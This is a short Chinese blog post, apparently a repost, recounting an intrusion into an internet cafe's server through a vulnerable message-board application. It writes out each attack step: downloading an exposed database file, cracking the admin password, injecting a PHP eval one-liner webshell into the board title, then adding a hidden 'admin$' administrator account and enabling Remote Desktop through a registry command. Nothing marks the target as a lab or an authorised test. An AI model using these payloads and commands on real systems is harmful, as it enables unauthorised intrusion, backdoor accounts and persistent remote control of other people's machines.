记一次网吧渗透（未完）

网吧使用易游留言板，存在低级漏洞 http://www.fucktest.com:18897/eyooboard/include/data/message.db 得到数据库。文本文档打开，得到admin加密后密码 解密后登录后台，留言板标题插入一句话。 ${${eval($_POST['cmd'])}} 报错， 本地搭建测试环境。查看 configure.data.php。发现插进去是这样的。。 等管理员重装留言板后，再插。 ${${eval($_POST[cmd])}} 成功，菜刀链接 接着 net user admin$ admin123 /add net localgroup administrators admin$ /add

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

得到管理员。

mstsc链接



未完待续。。。

转载于:https://www.cnblogs.com/pcx69/p/3661315.html